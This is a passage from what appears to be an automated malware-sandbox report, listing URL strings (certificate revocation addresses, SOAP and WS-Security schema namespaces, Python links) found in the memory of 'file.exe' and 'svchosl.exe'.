0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: svchosl.exe, 0000000E.00000003.2368939718.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: svchosl.exe, 0000000E.00000003.2368939718.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic;
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: svchosl.exe, 00000010.00000002.3277827122.0000021306740000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://greenbytes.de/tech/tc2231/
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://ocsp.thawte.com0
Source: file.exe, 00000000.00000003.2286126456.000000000AF31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3300621958.000000000AF40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://purl.oen6
Source: svchosl.exe, 00000010.00000002.3277478424.00000213065F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pypi.python.org/pypi/wget/
Source: svchosl.exe, 00000010.00000002.3282402293.00007FF8A8DFD000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmH
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
